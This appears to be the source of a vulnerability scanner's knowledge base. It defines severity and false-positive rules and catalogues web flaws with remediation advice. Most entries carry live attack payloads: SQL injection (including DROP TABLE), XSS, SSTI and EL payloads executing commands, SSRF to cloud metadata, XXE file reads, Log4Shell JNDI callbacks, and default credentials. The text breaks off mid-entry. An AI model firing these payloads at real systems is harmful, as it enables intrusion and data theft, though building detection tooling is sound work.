"""Extended knowledge base with detailed vulnerability data."""

from __future__ import annotations

# SEVERITY ASSESSMENT RULES
# The scanner uses these to determine TRUE severity, not guessed severity.

SEVERITY_RULES = {
    "critical": {
        "description": "Direct exploitation possible, immediate data breach or RCE",
        "criteria": [
            "Remote Code Execution (RCE) on server or client",
            "Full database access (SQLi with data exfil PoC)",
            "Authentication bypass to admin/privileged accounts",
            "Account takeover of ANY user (password reset, token prediction)",
            "SSRF that reads internal resources or cloud metadata",
            "Payment/financial manipulation (race conditions with monetary impact)",
            "Secret key exposure WITH demonstrated impact (AWS keys that work)",
            "Stored XSS in admin panel or affecting all users",
        ],
        "NOT_critical": [
            "Blind SQLi without data exfil PoC = High not Critical",
            "SSRF to localhost without data read = Medium",
            "XSS that requires user interaction = usually High",
            "Exposed API key that is revoked or read-only = Low/Medium",
        ],
    },
    "high": {
        "description": "Significant security impact, exploitation likely",
        "criteria": [
            "Stored XSS affecting other users",
            "IDOR accessing other users' data",
            "Blind SQLi (confirmed but without full dump PoC)",
            "JWT algorithm confusion (alg:none, weak signing)",
            "CORS misconfiguration WITH credential theft PoC",
            "OAuth token theft via redirect manipulation",
            "Privilege escalation (user → admin)",
            "SSTI with confirmed code execution",
        ],
    },
    "medium": {
        "description": "Security impact exists but requires conditions",
        "criteria": [
            "Reflected XSS (requires victim to click link)",
            "CSRF on state-changing actions",
            "Information disclosure of internal architecture",
            "Missing security headers WITH demonstrated attack",
            "Open redirect (phishing/token theft vector)",
            "Rate limiting bypass on sensitive endpoints",
            "Exposed Spring Boot Actuator health/info endpoints",
        ],
    },
    "low": {
        "description": "Minor security impact, limited exploitation",
        "criteria": [
            "Information disclosure of non-sensitive data",
            "Missing security headers without attack PoC",
            "Verbose error messages",
            "Version disclosure",
            "SSL/TLS misconfiguration (weak ciphers but not exploitable)",
        ],
    },
}


# FALSE POSITIVE ELIMINATION RULES
# If a finding matches ANY of these patterns, it needs extra validation.

FALSE_POSITIVE_RULES = {
    "sqli": {
        "must_validate": [
            "Response must differ between true/false conditions",
            "Time-based must show consistent delay (not network jitter)",
            "Error-based must show ACTUAL SQL error, not generic error page",
            "UNION-based must return data from injected query",
        ],
        "common_fps": [
            "WAF block pages that contain SQL-like error text",
            "Application error pages with SQL keywords in stack traces",
            "Pages that always show different content (A/B testing)",
            "Slow endpoints that look like time-based SQLi",
        ],
    },
    "xss": {
        "must_validate": [
            "Payload must render in page source (not just URL)",
            "Script must execute (not just be reflected in attribute/comment)",
            "Dom XSS must trigger actual sink execution",
            "Context matters: in HTML vs attribute vs JS vs URL",
        ],
        "common_fps": [
            "Input reflected but HTML-encoded",
            "Input in JSON response (not rendered as HTML)",
            "WAF strips script tags but shows partial reflection",
            "CSP prevents script execution (still reportable but lower severity)",
        ],
    },
    "ssrf": {
        "must_validate": [
            "Must demonstrate server-side request to attacker-controlled endpoint",
            "Blind SSRF needs out-of-band confirmation (DNS/HTTP callback)",
            "Internal resource read needs actual data in response",
        ],
        "common_fps": [
            "Client-side redirect (not server-side)",
            "URL preview that only shows metadata (not full fetch)",
            "Webhook that validates URL but doesn't fetch",
        ],
    },
    "idor": {
        "must_validate": [
            "Must access data belonging to DIFFERENT user",
            "Must use different auth session for the modified request",
            "Sequential ID change must return different user's data",
            "UUID-based IDOR needs demonstration of ID enumeration",
        ],
        "common_fps": [
            "Accessing your own data with different ID format",
            "Public data that's meant to be accessible",
            "Admin endpoint that returns 403 (not IDOR)",
        ],
    },
}


# MASTER VULNERABILITY DATABASE
# Every vulnerability type the scanner should know about.

MEGA_KB: list[dict] = [

    # WEB APPLICATION VULNERABILITIES (70+)


    {
        "vuln_id": "WEB-001",
        "category": "injection",
        "title": "SQL Injection (Error-Based)",
        "severity": "critical",
        "cvss_score": 9.8,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cwe": "CWE-89",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "inject_and_observe",
            "payloads": ["'", "\"", "' OR '1'='1", "1' AND '1'='1", "1; DROP TABLE--"],
            "indicators": [
                r"you have an error in your SQL syntax",
                r"Unclosed quotation mark",
                r"quoted string not properly terminated",
                r"pg_query\(\): Query failed",
                r"ORA-\d{5}",
                r"Microsoft OLE DB Provider",
                r"SQLSTATE\[",
            ],
            "validation": "Inject canary (e.g. ' AND 1=1--) and verify response differs from ' AND 1=2--",
        },
        "is_critical_when": "Data exfiltration demonstrated (UNION SELECT or error-based extraction of table names/data)",
        "is_not_critical_when": "Only error message disclosed without data extraction — downgrade to High",
        "impact": "Full database compromise. Credential theft, data exfil, RCE via DB features.",
        "remediation": "Use parameterized queries. Apply least-privilege DB accounts. Enable WAF rules.",
        "poc_template": (
            "1. Navigate to {url}\n"
            "2. In the {param} parameter, inject: {payload}\n"
            "3. Observe the SQL error in the response: {evidence}\n"
            "4. Confirm data extraction with: ' UNION SELECT table_name FROM information_schema.tables--\n"
            "5. The following tables were exposed: {tables}"
        ),
    },
    {
        "vuln_id": "WEB-001a",
        "category": "injection",
        "title": "SQL Injection (Blind Boolean-Based)",
        "severity": "critical",
        "cvss_score": 9.8,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cwe": "CWE-89",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "boolean_differential",
            "payloads": [
                "' AND '1'='1", "' AND '1'='2",
                "' AND SUBSTRING(@@version,1,1)='5", "' AND SUBSTRING(@@version,1,1)='4",
            ],
            "indicators": ["response_length_differs", "content_differs"],
            "validation": "Send true condition vs false condition. Page content must consistently differ.",
        },
        "is_critical_when": "Data extraction demonstrated character-by-character",
        "is_not_critical_when": "Only boolean difference observed without data extraction",
        "impact": "Full database compromise via character-by-character extraction.",
        "remediation": "Parameterized queries. WAF with blind SQLi signatures.",
    },
    {
        "vuln_id": "WEB-001b",
        "category": "injection",
        "title": "SQL Injection (Blind Time-Based)",
        "severity": "critical",
        "cvss_score": 9.8,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cwe": "CWE-89",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "timing_differential",
            "payloads": [
                "' AND SLEEP(5)--",
                "'; WAITFOR DELAY '0:0:5'--",
                "' AND pg_sleep(5)--",
                "' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--",
            ],
            "indicators": ["response_time_>5s"],
            "validation": "Run 3 times with SLEEP and 3 without. Median must differ by >4s consistently.",
        },
        "is_critical_when": "Consistent timing difference confirmed across multiple requests",
        "is_not_critical_when": "Inconsistent timing (network jitter) — needs more evidence",
        "impact": "Database compromise via time-based inference. Also enables DoS.",
        "remediation": "Parameterized queries. Aggressive query timeouts.",
    },
    {
        "vuln_id": "WEB-001c",
        "category": "injection",
        "title": "SQL Injection (UNION-Based)",
        "severity": "critical",
        "cvss_score": 9.8,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cwe": "CWE-89",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "union_select",
            "payloads": [
                "' UNION SELECT NULL--",
                "' UNION SELECT NULL,NULL--",
                "' UNION SELECT 1,2,3--",
            ],
            "indicators": ["union_data_in_response"],
            "validation": "Determine column count via ORDER BY, then UNION SELECT with known values.",
        },
        "is_critical_when": "Data from other tables visible in response",
        "impact": "Direct data exfiltration — credentials, PII, financial records.",
        "remediation": "Parameterized queries. Restrict UNION privileges.",
    },
    {
        "vuln_id": "WEB-001d",
        "category": "injection",
        "title": "NoSQL Injection",
        "severity": "high",
        "cvss_score": 8.1,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "cwe": "CWE-943",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "operator_injection",
            "payloads": [
                '{"$gt": ""}', '{"$ne": ""}', '{"$regex": ".*"}',
                '{"$where": "sleep(5000)"}',
            ],
            "indicators": ["auth_bypass", "different_response", "timing"],
            "validation": "Send $ne empty string in password field — if login succeeds, confirmed.",
        },
        "is_critical_when": "Authentication bypass demonstrated",
        "impact": "Auth bypass, data exfiltration from document stores.",
        "remediation": "Validate input types strictly. Reject objects where strings expected.",
    },
    {
        "vuln_id": "WEB-002",
        "category": "injection",
        "title": "Cross-Site Scripting (Reflected)",
        "severity": "medium",
        "cvss_score": 6.1,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "cwe": "CWE-79",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "reflection_analysis",
            "payloads": [
                "<script>alert(1)</script>",
                "'\"><img src=x onerror=alert(1)>",
                "javascript:alert(1)",
                "<svg/onload=alert(1)>",
            ],
            "indicators": ["payload_in_response_unencoded"],
            "validation": "Payload must appear in HTML source unencoded AND execute in browser context.",
        },
        "is_critical_when": "Never — Reflected XSS is Medium (requires user click). High if in admin panel.",
        "impact": "Session hijacking, phishing, malware delivery via crafted links.",
        "remediation": "Context-aware output encoding. CSP headers.",
    },
    {
        "vuln_id": "WEB-002a",
        "category": "injection",
        "title": "Cross-Site Scripting (Stored)",
        "severity": "high",
        "cvss_score": 8.1,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
        "cwe": "CWE-79",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "store_and_retrieve",
            "payloads": ["<script>alert(document.domain)</script>", "<img src=x onerror=alert(1)>"],
            "indicators": ["payload_persisted_and_rendered"],
            "validation": "Store payload via POST, retrieve via GET in new session, verify execution.",
        },
        "is_critical_when": "In admin panel, or affects ALL users on main page, or wormable",
        "is_not_critical_when": "Only visible to the user who stored it (Self-XSS = not eligible)",
        "impact": "Mass session hijacking, account takeover, defacement.",
        "remediation": "Input sanitization + output encoding. CSP. HttpOnly cookies.",
    },
    {
        "vuln_id": "WEB-002b",
        "category": "injection",
        "title": "Cross-Site Scripting (DOM-Based)",
        "severity": "medium",
        "cvss_score": 6.1,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "cwe": "CWE-79",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "source_sink_analysis",
            "sources": [
                "location.hash", "location.search", "location.href",
                "document.referrer", "window.name", "postMessage data",
            ],
            "sinks": [
                "innerHTML", "outerHTML", "document.write", "eval",
                "setTimeout(string)", "setInterval(string)", "Function()",
                "$.html()", "v-html", "dangerouslySetInnerHTML",
            ],
            "validation": "Trace data flow from source to sink in JS. Confirm no sanitization.",
        },
        "is_critical_when": "In payment page or affects sensitive operations",
        "impact": "Client-side code execution via DOM manipulation.",
        "remediation": "Use textContent instead of innerHTML. Sanitize all DOM sources.",
    },
    {
        "vuln_id": "WEB-003",
        "category": "injection",
        "title": "Server-Side Template Injection (SSTI)",
        "severity": "critical",
        "cvss_score": 9.8,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cwe": "CWE-1336",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "math_expression_test",
            "payloads": {
                "generic": ["{{7*7}}", "${7*7}", "<%= 7*7 %>", "#{7*7}", "${{7*7}}"],
                "jinja2": ["{{config}}", "{{self.__init__.__globals__}}"],
                "freemarker": ["${7*7}", "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"id\")}"],
                "velocity": ["#set($x=7*7)$x"],
                "smarty": ["{php}echo `id`;{/php}"],
                "erb": ["<%= system('id') %>"],
                "pebble": ["{% set cmd = 'id' %}"],
            },
            "indicators": ["49_in_response", "config_object_in_response"],
            "validation": "Inject {{7*7}} — if 49 appears in response, confirmed. Then determine engine.",
        },
        "is_critical_when": "RCE demonstrated (e.g., reading /etc/passwd or executing system commands)",
        "impact": "Remote Code Execution. Full server compromise.",
        "remediation": "Never pass user input to template engine. Use sandboxed templates.",
    },
    {
        "vuln_id": "WEB-004",
        "category": "injection",
        "title": "OS Command Injection",
        "severity": "critical",
        "cvss_score": 9.8,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cwe": "CWE-78",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "command_separator_injection",
            "payloads": [
                "; id", "| id", "|| id", "&& id", "`id`", "$(id)",
                "; sleep 5", "| sleep 5", "& ping -c 5 127.0.0.1 &",
            ],
            "indicators": ["uid=", "command_output_in_response", "timing_delay"],
            "validation": "Inject `id` command separator — if uid= appears in response, confirmed.",
        },
        "is_critical_when": "Always critical — any command execution = full server compromise",
        "impact": "Complete server takeover. Lateral movement. Data destruction.",
        "remediation": "Never pass user input to shell commands. Use language-native APIs.",
    },
    {
        "vuln_id": "WEB-005",
        "category": "injection",
        "title": "Server-Side Request Forgery (SSRF)",
        "severity": "high",
        "cvss_score": 7.5,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
        "cwe": "CWE-918",
        "owasp": "A10:2021 SSRF",
        "detection": {
            "method": "url_parameter_redirect",
            "payloads": [
                "http://169.254.169.254/latest/meta-data/",
                "http://127.0.0.1:8080/",
                "http://[::1]:8080/",
                "http://0177.0.0.1/",
                "http://2130706433/",
                "file:///etc/passwd",
                "http://metadata.google.internal/",
                "http://169.254.169.254/metadata/v1/",
            ],
            "indicators": ["internal_data_in_response", "dns_callback", "timing_difference"],
            "validation": "Use OOB callback (Burp Collaborator, webhook.site). If server calls your endpoint, confirmed.",
        },
        "is_critical_when": "Cloud metadata accessed (AWS keys, GCP tokens) or internal services reached",
        "is_not_critical_when": "Only port scanning / blind SSRF without data read = Medium",
        "impact": "Cloud credential theft, internal service access, network pivoting.",
        "remediation": "Allowlist outbound URLs. Block metadata IPs. Use egress proxy.",
    },
    {
        "vuln_id": "WEB-006",
        "category": "injection",
        "title": "XML External Entity (XXE) Injection",
        "severity": "high",
        "cvss_score": 7.5,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
        "cwe": "CWE-611",
        "owasp": "A05:2021 Security Misconfiguration",
        "detection": {
            "method": "entity_declaration",
            "payloads": [
                '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
                '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://CALLBACK">]><foo>&xxe;</foo>',
            ],
            "indicators": ["file_contents_in_response", "dns_callback"],
            "validation": "Inject XXE payload referencing /etc/passwd or OOB callback.",
        },
        "is_critical_when": "File read demonstrated or internal network access",
        "impact": "File read, SSRF, denial of service (billion laughs).",
        "remediation": "Disable external entities in XML parser. Use JSON instead of XML.",
    },
    {
        "vuln_id": "WEB-007",
        "category": "injection",
        "title": "LDAP Injection",
        "severity": "high",
        "cvss_score": 8.1,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "cwe": "CWE-90",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "ldap_operator_injection",
            "payloads": ["*)(cn=*", "*()|%26'", "admin)(&)", "admin))%00"],
            "indicators": ["ldap_error", "auth_bypass", "different_results"],
            "validation": "Inject * wildcard in username field — if all users returned, confirmed.",
        },
        "is_critical_when": "Authentication bypass achieved",
        "impact": "Directory enumeration, authentication bypass.",
        "remediation": "Escape LDAP special characters. Use parameterized LDAP queries.",
    },
    {
        "vuln_id": "WEB-008",
        "category": "injection",
        "title": "XPath Injection",
        "severity": "high",
        "cvss_score": 7.5,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "cwe": "CWE-643",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "xpath_operator_injection",
            "payloads": ["' or '1'='1", "' or ''='", "1' and '1'='1"],
            "indicators": ["xpath_error", "all_data_returned"],
            "validation": "Inject true condition — if more data returned than expected.",
        },
        "impact": "XML data extraction, authentication bypass.",
        "remediation": "Parameterize XPath queries. Validate input types.",
    },
    {
        "vuln_id": "WEB-009",
        "category": "injection",
        "title": "Expression Language Injection (EL/SpEL)",
        "severity": "critical",
        "cvss_score": 9.8,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cwe": "CWE-917",
        "owasp": "A03:2021 Injection",
        "detection": {
            "method": "el_expression_test",
            "payloads": [
                "${7*7}", "#{7*7}", "${T(java.lang.Runtime).getRuntime().exec('id')}",
                "#{T(java.lang.Runtime).getRuntime().exec('id')}",
            ],
            "indicators": ["49_in_response", "command_output"],
            "validation": "Inject ${7*7} — if 49 appears, try RCE payload.",
        },
        "is_critical_when": "RCE demonstrated",
        "impact": "Remote Code Execution on Java applications.",
        "remediation": "Never evaluate user input as EL expressions.",
    },
    {
        "vuln_id": "WEB-010",
        "category": "injection",
        "title": "Log4Shell / Log4j RCE (CVE-2021-44228)",
        "severity": "critical",
        "cvss_score": 10.0,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "cwe": "CWE-502",
        "owasp": "A06:2021 Vulnerable Components",
        "detection": {
            "method": "jndi_lookup_injection",
            "payloads": [
                "${jndi:ldap://CALLBACK/a}",
                "${${lower:j}${lower:n}${lower:d}${lower:i}:ldap://CALLBACK/a}",
                "${jndi:dns://CALLBACK}",
            ],
            "indicators": ["dns_callback", "ldap_callback"],
            "validation": "Inject JNDI payload in all input fields AND headers (User-Agent, X-Forwarded-For). Check OOB callback.",
        },
        "is_critical_when": "Any OOB callback received = critical RCE",
        "impact": "Unauthenticated Remote Code Execution. Full system compromise.",
        "remediation": "Upgrade to Log4j 2.17+. Set -Dlog4j2.formatMsgNoLookups=true.",
    },


    {
        "vuln_id": "WEB-020",
        "category": "access_control",
        "title": "Insecure Direct Object Reference (IDOR)",
        "severity": "high",
        "cvss_score": 7.5,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "cwe": "CWE-639",
        "owasp": "A01:2021 Broken Access Control",
        "detection": {
            "method": "parameter_manipulation",
            "technique": [
                "Create two accounts (user A, user B)",
                "Capture API request from user A (e.g., GET /api/user/123)",
                "Replay with user B's session but user A's ID",
                "If user B sees user A's data → IDOR confirmed",
            ],
            "indicators": ["other_user_data_in_response", "sequential_ids"],
            "validation": "MUST use two different sessions. Same session = not IDOR.",
        },
        "is_critical_when": "Accessing financial data, PII, or modifying other users' data",
        "is_not_critical_when": "Accessing public/non-sensitive data = informational",
        "impact": "Unauthorized data access. Mass data harvesting via enumeration.",
        "remediation": "Server-side access control checks. Use UUIDs instead of sequential IDs.",
    },
    {
        "vuln_id": "WEB-021",
        "category": "access_control",
        "title": "Broken Access Control — Horizontal Privilege Escalation",
        "severity": "high",
        "cvss_score": 8.1,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "cwe": "CWE-284",
        "owasp": "A01:2021 Broken Access Control",
        "detection": {
            "method": "role_manipulation",
            "technique": [
                "Login as regular user",
                "Identify admin-only endpoints (from JS files, API docs, or error messages)",
                "Access admin endpoint with regular user session",
                "If access granted → privilege escalation",
            ],
        },
        "is_critical_when": "Admin functionality accessible by regular user",
        "impact": "Full application compromise through privilege escalation.",
        "remediation": "Implement server-side role checks on every endpoint.",
    },
    {
        "vuln_id": "WEB-022",
        "category": "access_control",
        "title": "Broken Access Control — Vertical Privilege Escalation",
        "severity": "critical",
        "cvss_score": 9.1,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "cwe": "CWE-269",
        "owasp": "A01:2021 Broken Access Control",
        "detection": {
            "method": "role_parameter_tampering",
            "technique": [
                "Register as regular user",
                "Capture registration/profile update request",
                "Add role=admin or isAdmin=true parameter",
                "Check if privileges elevated",
            ],
        },
        "is_critical_when": "Always critical — user becomes admin",
        "impact": "Complete application takeover via role manipulation.",
    },
    {
        "vuln_id": "WEB-023",
        "category": "access_control",
        "title": "Missing Function Level Access Control",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-285",
        "owasp": "A01:2021 Broken Access Control",
        "detection": {
            "method": "endpoint_brute_force",
            "technique": [
                "Discover admin endpoints from JS bundles, sitemap, or error pages",
                "Try accessing /admin, /admin/users, /api/admin/* without admin session",
            ],
        },
        "impact": "Unauthorized admin access without authentication.",
    },
    {
        "vuln_id": "WEB-024",
        "category": "access_control",
        "title": "Path Traversal / Local File Inclusion",
        "severity": "high",
        "cvss_score": 7.5,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "cwe": "CWE-22",
        "owasp": "A01:2021 Broken Access Control",
        "detection": {
            "method": "path_traversal_injection",
            "payloads": [
                "../../../etc/passwd", "..\\..\\..\\windows\\win.ini",
                "....//....//....//etc/passwd", "%2e%2e%2f%2e%2e%2f",
                "../../../etc/passwd%00.jpg",
            ],
            "indicators": ["root:x:0:0", "for 16-bit", "file_contents"],
            "validation": "If /etc/passwd content appears in response, confirmed.",
        },
        "is_critical_when": "Sensitive file read (credentials, keys, configs)",
        "impact": "Source code disclosure, credential theft, config exposure.",
        "remediation": "Validate/sanitize file paths. Use chroot. Never use user input in file paths.",
    },


    {
        "vuln_id": "AUTH-001",
        "category": "authentication",
        "title": "Authentication Bypass",
        "severity": "critical",
        "cvss_score": 9.8,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cwe": "CWE-287",
        "owasp": "A07:2021 Identification and Authentication Failures",
        "detection": {
            "method": "multi_vector_bypass",
            "techniques": [
                "Remove Authorization header entirely",
                "Send empty Bearer token",
                "Send JWT with alg:none",
                "Manipulate cookies (delete session, change user ID)",
                "Access authenticated endpoints without any session",
                "SQL injection in login form",
                "Default credentials",
            ],
        },
        "is_critical_when": "Always critical — any auth bypass = critical",
        "impact": "Unauthorized access to all application functionality.",
    },
    {
        "vuln_id": "AUTH-002",
        "category": "authentication",
        "title": "JWT Algorithm Confusion (alg:none)",
        "severity": "critical",
        "cvss_score": 9.1,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "cwe": "CWE-347",
        "owasp": "A02:2021 Cryptographic Failures",
        "detection": {
            "method": "jwt_manipulation",
            "payloads": [
                "Decode JWT, change alg to 'none', remove signature",
                "Change alg from RS256 to HS256, sign with public key",
                "Set exp to far future, change sub/user_id",
            ],
            "validation": "Modify JWT alg to none, strip signature, replay — if accepted, confirmed.",
        },
        "is_critical_when": "Token accepted by server with modified claims",
        "impact": "Full authentication bypass. Impersonate any user.",
    },
    {
        "vuln_id": "AUTH-003",
        "category": "authentication",
        "title": "Account Takeover via Password Reset",
        "severity": "critical",
        "cvss_score": 9.8,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cwe": "CWE-640",
        "owasp": "A07:2021 Identification and Authentication Failures",
        "detection": {
            "method": "reset_flow_analysis",
            "techniques": [
                "Check if reset token is predictable (sequential, timestamp-based)",
                "Check if reset link works for different user (token reuse)",
                "Check if host header injection changes reset link domain",
                "Check if rate limiting exists on reset attempts",
                "Check if old token invalidated after new one generated",
            ],
        },
        "is_critical_when": "Any account can be taken over via password reset manipulation",
        "impact": "Full account takeover of any user.",
    },
    {
        "vuln_id": "AUTH-004",
        "category": "authentication",
        "title": "OAuth/OIDC Misconfiguration",
        "severity": "high",
        "cvss_score": 8.1,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
        "cwe": "CWE-346",
        "owasp": "A07:2021 Identification and Authentication Failures",
        "detection": {
            "method": "oauth_flow_analysis",
            "techniques": [
                "Check redirect_uri validation (open redirect → token theft)",
                "Check state parameter (missing = CSRF on OAuth)",
                "Check if authorization code can be replayed",
                "Check token leakage in referrer header",
                "Check implicit flow used (token in URL fragment)",
            ],
        },
        "is_critical_when": "Token theft demonstrated via redirect manipulation",
        "impact": "OAuth token theft, account takeover.",
    },
    {
        "vuln_id": "AUTH-005",
        "category": "authentication",
        "title": "Session Fixation",
        "severity": "medium",
        "cvss_score": 5.4,
        "cwe": "CWE-384",
        "owasp": "A07:2021 Identification and Authentication Failures",
        "detection": {
            "method": "session_comparison",
            "technique": "Compare session cookie before and after login. If same, vulnerable.",
        },
        "impact": "Attacker can pre-set session and wait for victim to login.",
    },
    {
        "vuln_id": "AUTH-006",
        "category": "authentication",
        "title": "MFA Bypass",
        "severity": "high",
        "cvss_score": 8.1,
        "cwe": "CWE-308",
        "owasp": "A07:2021 Identification and Authentication Failures",
        "detection": {
            "method": "mfa_flow_analysis",
            "techniques": [
                "Skip MFA step by going directly to post-MFA URL",
                "Reuse previous valid MFA code",
                "Brute force MFA code (missing rate limit)",
                "Manipulate response (change 'mfa_required' to false)",
                "Check backup codes enumeration",
            ],
        },
        "is_critical_when": "Complete MFA bypass achieved",
        "impact": "Second factor completely bypassed.",
    },
    {
        "vuln_id": "AUTH-007",
        "category": "authentication",
        "title": "Default / Weak Credentials",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-798",
        "owasp": "A07:2021 Identification and Authentication Failures",
        "detection": {
            "method": "credential_testing",
            "credentials": [
                ("admin", "admin"), ("admin", "password"), ("admin", "123456"),
                ("root", "root"), ("test", "test"), ("administrator", "administrator"),
                ("admin", "admin123"), ("admin", ""), ("guest", "guest"),
            ],
        },
        "is_critical_when": "Admin access gained with default credentials",
        "impact": "Unauthorized admin access.",
    },


    {
        "vuln_id": "WEB-030",
        "category": "csrf",
        "title": "Cross-Site Request Forgery (CSRF)",
        "severity": "medium",
        "cvss_score": 6.5,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "cwe": "CWE-352",
        "owasp": "A01:2021 Broken Access Control",
        "detection": {
            "method": "token_analysis",
            "checks": [
                "Remove CSRF token from request — does it still work?",
                "Use token from different session — does it still work?",
                "Change POST to GET — does it still work?",
                "Check SameSite cookie attribute",
                "Check Origin/Referer validation",
            ],
            "validation": "Create HTML PoC page that submits form to target. If state changes, confirmed.",
        },
        "is_critical_when": "State-changing action (password change, email change, fund transfer)",
        "is_not_critical_when": "Non-sensitive action (theme change, language preference)",
        "impact": "Unauthorized state changes on behalf of authenticated users.",
    },


    {
        "vuln_id": "WEB-031",
        "category": "cors",
        "title": "CORS Misconfiguration — Origin Reflection",
        "severity": "high",
        "cvss_score": 7.5,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
        "cwe": "CWE-942",
        "owasp": "A05:2021 Security Misconfiguration",
        "detection": {
            "method": "origin_reflection_test",
            "technique": [
                "Send request with Origin: https://evil.com",
                "Check if Access-Control-Allow-Origin reflects evil.com",
                "Check if Access-Control-Allow-Credentials: true",
                "If both true → data theft possible",
            ],
            "validation": "Build JS PoC that reads API response from evil domain.",
        },
        "is_critical_when": "Credentials: true + origin reflection + sensitive data in response",
        "is_not_critical_when": "No credentials or only public data accessible — Medium",
        "impact": "Cross-origin data theft from authenticated endpoints.",
    },
    {
        "vuln_id": "WEB-032",
        "category": "cors",
        "title": "CORS Misconfiguration — Null Origin Allowed",
        "severity": "medium",
        "cvss_score": 6.5,
        "cwe": "CWE-942",
        "owasp": "A05:2021 Security Misconfiguration",
        "detection": {
            "method": "null_origin_test",
            "technique": "Send request with Origin: null. Check if allowed.",
        },
        "is_critical_when": "Combined with credentials: true on sensitive endpoints",
        "impact": "Origin null can be triggered via sandboxed iframes → data theft.",
    },


    {
        "vuln_id": "RACE-001",
        "category": "race_condition",
        "title": "Race Condition — Double Spend / Duplicate Action",
        "severity": "high",
        "cvss_score": 8.1,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "cwe": "CWE-362",
        "owasp": "A04:2021 Insecure Design",
        "detection": {
            "method": "concurrent_requests",
            "technique": [
                "Identify single-use action (coupon redeem, fund transfer, vote)",
                "Send 20+ concurrent requests using Turbo Intruder or threading",
                "Check if action executed multiple times",
            ],
            "validation": "Must demonstrate actual duplicate execution (double balance, double coupon).",
        },
        "is_critical_when": "Financial impact (double spend, free money)",
        "is_not_critical_when": "Only cosmetic duplicate (duplicate like, duplicate follow)",
        "impact": "Financial loss, inventory manipulation, vote stuffing.",
    },
    {
        "vuln_id": "RACE-002",
        "category": "race_condition",
        "title": "Race Condition — Rate Limit Bypass",
        "severity": "medium",
        "cvss_score": 5.3,
        "cwe": "CWE-362",
        "owasp": "A04:2021 Insecure Design",
        "detection": {
            "method": "burst_requests",
            "technique": "Send burst of requests within rate limit window. Check execution count.",
        },
        "is_critical_when": "Bypasses OTP rate limit enabling brute force",
        "impact": "Rate limiting ineffective, enables brute force attacks.",
    },


    {
        "vuln_id": "SMUG-001",
        "category": "request_smuggling",
        "title": "HTTP Request Smuggling (CL.TE)",
        "severity": "critical",
        "cvss_score": 9.1,
        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
        "cwe": "CWE-444",
        "owasp": "A05:2021 Security Misconfiguration",
        "detection": {
            "method": "timing_differential",
            "technique": [
                "Send request with both Content-Length and Transfer-Encoding",
